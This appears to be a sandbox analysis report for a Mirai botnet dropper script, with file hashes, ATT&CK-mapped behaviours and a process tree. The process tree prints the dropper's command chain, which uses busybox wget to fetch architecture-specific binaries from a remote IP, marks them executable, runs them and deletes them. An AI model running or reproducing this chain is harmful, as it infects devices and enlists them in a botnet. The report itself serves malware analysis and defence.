mirai | 51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a

Analysis

max time kernel
107s
max time network
154s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
08/03/2025, 07:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
Size

1KB
MD5

a9f753da46e0678e9652f1417378e79a
SHA1

19bf100cae7a6a8fa9a42d0368ff1918c9b796ac
SHA256

51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a
SHA512

3969653a243f80154bbca0045c35e3e8e0b47fdc85bcc13c8887c24e2c207dfd92e3265393ea7d8a28347c67d69501a0d7a2aa2247e116a0705d33731bdce636

Score

10^/10

mirai botnet botnet credential_access defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (116897) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
778	busybox
736	busybox
743	busybox
748	busybox
753	busybox
774	busybox
782	busybox
709	busybox
726	busybox
761	busybox
766	busybox
770	busybox

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/jklarm	711	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklarm5	727	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklarm6	737	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklarm7	744	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklm68k	749	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklmips	754	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklmpsl	762	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	jklmips
File opened for modification	/dev/misc/watchdog	jklmips

Renames itself 1 IoCs

pid	Process
754	jklmips

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	51.158.108.203

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmips

Enumerates running processes
Discovers information about currently running processes on the system

Reads process memory 1 TTPs 64 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/775/maps	jklmips
File opened for reading	/proc/761/maps	jklmips
File opened for reading	/proc/772/maps	jklmips
File opened for reading	/proc/778/maps	jklmips
File opened for reading	/proc/798/maps	jklmips
File opened for reading	/proc/848/maps	jklmips
File opened for reading	/proc/857/maps	jklmips
File opened for reading	/proc/833/maps	jklmips
File opened for reading	/proc/765/maps	jklmips
File opened for reading	/proc/780/maps	jklmips
File opened for reading	/proc/792/maps	jklmips
File opened for reading	/proc/795/maps	jklmips
File opened for reading	/proc/809/maps	jklmips
File opened for reading	/proc/812/maps	jklmips
File opened for reading	/proc/849/maps	jklmips
File opened for reading	/proc/767/maps	jklmips
File opened for reading	/proc/784/maps	jklmips
File opened for reading	/proc/787/maps	jklmips
File opened for reading	/proc/821/maps	jklmips
File opened for reading	/proc/826/maps	jklmips
File opened for reading	/proc/840/maps	jklmips
File opened for reading	/proc/847/maps	jklmips
File opened for reading	/proc/855/maps	jklmips
File opened for reading	/proc/766/maps	jklmips
File opened for reading	/proc/783/maps	jklmips
File opened for reading	/proc/786/maps	jklmips
File opened for reading	/proc/822/maps	jklmips
File opened for reading	/proc/845/maps	jklmips
File opened for reading	/proc/846/maps	jklmips
File opened for reading	/proc/852/maps	jklmips
File opened for reading	/proc/865/maps	jklmips
File opened for reading	/proc/769/maps	jklmips
File opened for reading	/proc/776/maps	jklmips
File opened for reading	/proc/804/maps	jklmips
File opened for reading	/proc/813/maps	jklmips
File opened for reading	/proc/841/maps	jklmips
File opened for reading	/proc/843/maps	jklmips
File opened for reading	/proc/866/maps	jklmips
File opened for reading	/proc/770/maps	jklmips
File opened for reading	/proc/774/maps	jklmips
File opened for reading	/proc/781/maps	jklmips
File opened for reading	/proc/789/maps	jklmips
File opened for reading	/proc/803/maps	jklmips
File opened for reading	/proc/854/maps	jklmips
File opened for reading	/proc/859/maps	jklmips
File opened for reading	/proc/791/maps	jklmips
File opened for reading	/proc/793/maps	jklmips
File opened for reading	/proc/810/maps	jklmips
File opened for reading	/proc/815/maps	jklmips
File opened for reading	/proc/838/maps	jklmips
File opened for reading	/proc/861/maps	jklmips
File opened for reading	/proc/773/maps	jklmips
File opened for reading	/proc/777/maps	jklmips
File opened for reading	/proc/779/maps	jklmips
File opened for reading	/proc/782/maps	jklmips
File opened for reading	/proc/801/maps	jklmips
File opened for reading	/proc/807/maps	jklmips
File opened for reading	/proc/850/maps	jklmips
File opened for reading	/proc/862/maps	jklmips
File opened for reading	/proc/816/maps	jklmips
File opened for reading	/proc/823/maps	jklmips
File opened for reading	/proc/836/maps	jklmips
File opened for reading	/proc/858/maps	jklmips
File opened for reading	/proc/796/maps	jklmips

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	scsi_eh_0	754	jklmips

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmips

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1/comm	jklmips
File opened for reading	/proc/7/comm	jklmips
File opened for reading	/proc/9/comm	jklmips
File opened for reading	/proc/72/comm	jklmips
File opened for reading	/proc/167/status	jklmips
File opened for reading	/proc/330/status	jklmips
File opened for reading	/proc/332/status	jklmips
File opened for reading	/proc/703/comm	jklmips
File opened for reading	/proc/469/status	jklmips
File opened for reading	/proc/782/cmdline	jklmips
File opened for reading	/proc/812/cmdline	jklmips
File opened for reading	/proc/857/cmdline	jklmips
File opened for reading	/proc/691/comm	jklmips
File opened for reading	/proc/698/comm	jklmips
File opened for reading	/proc/357/status	jklmips
File opened for reading	/proc/767/cmdline	jklmips
File opened for reading	/proc/795/cmdline	jklmips
File opened for reading	/proc/11/comm	jklmips
File opened for reading	/proc/236/comm	jklmips
File opened for reading	/proc/507/comm	jklmips
File opened for reading	/proc/704/status	jklmips
File opened for reading	/proc/766/cmdline	jklmips
File opened for reading	/proc/790/cmdline	jklmips
File opened for reading	/proc/802/cmdline	jklmips
File opened for reading	/proc/853/cmdline	jklmips
File opened for reading	/proc/10/comm	jklmips
File opened for reading	/proc/696/comm	jklmips
File opened for reading	/proc/735/comm	jklmips
File opened for reading	/proc/778/cmdline	jklmips
File opened for reading	/proc/845/cmdline	jklmips
File opened for reading	/proc/23/comm	jklmips
File opened for reading	/proc/697/comm	jklmips
File opened for reading	/proc/821/cmdline	jklmips
File opened for reading	/proc/17/comm	jklmips
File opened for reading	/proc/387/comm	jklmips
File opened for reading	/proc/704/comm	jklmips
File opened for reading	/proc/754/comm	jklmips
File opened for reading	/proc/379/status	jklmips
File opened for reading	/proc/387/status	jklmips
File opened for reading	/proc/815/cmdline	jklmips
File opened for reading	/proc/819/cmdline	jklmips
File opened for reading	/proc/73/comm	jklmips
File opened for reading	/proc/328/comm	jklmips
File opened for reading	/proc/236/status	jklmips
File opened for reading	/proc/775/cmdline	jklmips
File opened for reading	/proc/849/cmdline	jklmips
File opened for reading	/proc/854/cmdline	jklmips
File opened for reading	/proc/20/comm	jklmips
File opened for reading	/proc/506/comm	jklmips
File opened for reading	/proc/393/status	jklmips
File opened for reading	/proc/776/cmdline	jklmips
File opened for reading	/proc/823/cmdline	jklmips
File opened for reading	/proc/13/comm	jklmips
File opened for reading	/proc/461/comm	jklmips
File opened for reading	/proc/692/comm	jklmips
File opened for reading	/proc/761/cmdline	jklmips
File opened for reading	/proc/848/cmdline	jklmips
File opened for reading	/proc/139/status	jklmips
File opened for reading	/proc/786/cmdline	jklmips
File opened for reading	/proc/787/cmdline	jklmips
File opened for reading	/proc/792/cmdline	jklmips
File opened for reading	/proc/841/cmdline	jklmips
File opened for reading	/proc/858/cmdline	jklmips
File opened for reading	/proc/66/comm	jklmips

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
752	busybox
754	jklmips
756	busybox

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklmpsl	busybox
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklm68k	busybox

/tmp/51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
1⤵
- Executes dropped EXE
PID:699
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:701
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:709
- /tmp/jklarm
  ./jklarm exploit
  2⤵
  PID:711
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:714
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:716
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /tmp/jklarm5
  ./jklarm5 exploit
  2⤵
  PID:727
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:729
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:730
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/jklarm6
  ./jklarm6 exploit
  2⤵
  PID:737
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:739
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/jklarm7
  ./jklarm7 exploit
  2⤵
  PID:744
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:746
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:747
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/jklm68k
  ./jklm68k exploit
  2⤵
  PID:749
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:751
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:752
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/jklmips
  ./jklmips exploit
  2⤵
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Reads process memory
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:754
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:756
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:758
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/jklmpsl
  ./jklmpsl exploit
  2⤵
  PID:762
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:764
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
  2⤵
  PID:765
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/jklppc
  ./jklppc exploit
  2⤵
  PID:767
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:768
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
  2⤵
  PID:769
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/jklsh4
  ./jklsh4 exploit
  2⤵
  PID:771
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:772
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
  2⤵
  PID:773
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:774
- /tmp/jklspc
  ./jklspc exploit
  2⤵
  PID:775
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:776
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
  2⤵
  PID:777
- /bin/busybox
  /bin/busybox chmod +x jklx86
  2⤵
  - File and Directory Permissions Modification
  PID:778
- /tmp/jklx86
  ./jklx86 exploit
  2⤵
  PID:779
- /bin/busybox
  /bin/busybox rm -rf jklx86
  2⤵
  PID:780
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
  2⤵
  PID:781
- /bin/busybox
  /bin/busybox chmod +x jklarc
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/jklarc
  ./jklarc exploit
  2⤵
  PID:783
- /bin/busybox
  /bin/busybox rm -rf jklarc
  2⤵
  PID:784
- /bin/busybox
  /bin/busybox rm -rf wget.sh
  2⤵
  PID:785

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
55KB

MD5
847591420784f8bcc57bcf33d3f8e004

SHA1
f71e70254abfc295d9e6a352969172e06b6af496

SHA256
e7c7bf7f0aed9d07e10b900c9a8adc81983223967f409781520f9c9d1e5a36d6

SHA512
2da171c5e78f3e17195341577af0438266a25a59c64034736198bc1e9724c551f91e3da2335eb00b3a9b857407d94a69fb752a64c2e5edd05debb46546d73270

Download Submit
/tmp/jklarm5

Filesize
55KB

MD5
13646cedba2b07cac40f1722c5ef9bb1

SHA1
32ed76ad7e47f7919f7c8909321645cdcfeabe8b

SHA256
e2f8212e25b5c981e0be92428f013b289c4e2af6198d8414ed91c343ee1987df

SHA512
ce7bc090d5266283748f16be2b434a85a43ed5dff513d762653afc365872a360611fbd0dbfbce0628794d26e3a1a7a0a319c5039b74f74db7996acf5a864ed87

Download Submit
/tmp/jklarm6

Filesize
65KB

MD5
50bdc79e8119ec3deef4549fe78f959f

SHA1
b3898231d6b7d044566190bf2cbd04b1b20b7540

SHA256
cfee0df1ce4a388193fe3dd0dab48f4db9da05f67f7ccf0ba35fc8fcee38d397

SHA512
acb4a121ea03208cb12501aa332e4987841540a95703d7dac292fc766ed2b0b05e17343484c7c4a7d8c01d5952ea05b02964e72bf107f5fe0ffe51522f01875b

Download Submit
/tmp/jklarm7

Filesize
78KB

MD5
94a09ed2ea88808c8cd5652d3f9b9926

SHA1
f543a5233813c5e064f1e59ccb5b1d0cfa022fbb

SHA256
bde633cd452fed01853c937dc5393cd8580d7ebfccdae3df9260e38d051aba8a

SHA512
4622ed6b0ec8ad03c09fec7a7ce2e34914549c0f9a5c9a1b009b7907954659128f3af0c0ab6d170abec2734b83f396abaefd467ddba89ee568e708d1a6aaa405

Download Submit
/tmp/jklm68k

Filesize
56KB

MD5
0acff03063b48dcb09ccf509b1d94bd4

SHA1
914515bbdfaf8ced4ea85e0d9130f970da4c9c6b

SHA256
3c5a0bb66f9f394e54396a6781e1da0672becef6fa67841c903e1544bf9c0cfb

SHA512
31a8a33aaac479c4b683046c00dace95773072d4fa7a52d151db826d2cd38d9d7b1841eace0d67961e4c3d4b39bc251777cf658830277163ad304e53e622cff0

Download Submit
/tmp/jklmips

Filesize
74KB

MD5
531a60e53317c7bf134e5c6e57fc4939

SHA1
6069b3cb94084ec8bfad12f20a7fc992835e329d

SHA256
9c8fa144a9688475d367bf19f455fa2efcede7219a41cf77484cabe788e17fe9

SHA512
f19ca0527fb858aff4da9f864f1fad8433cc229b8ffabec4fd559a3af4a3fe3d71213a913067a6fea4314b75881ebbe5a8d24408cd8199a3ed54b15725c7505e

Download Submit
/tmp/jklmpsl

Filesize
74KB

MD5
d0667fe1aa667917ae32b2844024eba7

SHA1
6a4c65c673dd99d8c291aa343beb35f345c35def

SHA256
0d41d41efa67611f4721c465f81060f1d4c096eda88b72c0db43f104329afcb6

SHA512
9ff84ed51e53c77d228cd54fab728335c2d658006667c46db1da04c70e97444d47bf5ac6f87e4e4d812430bcca3c44e3ce186d1b604443b6de10bf5367699908

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads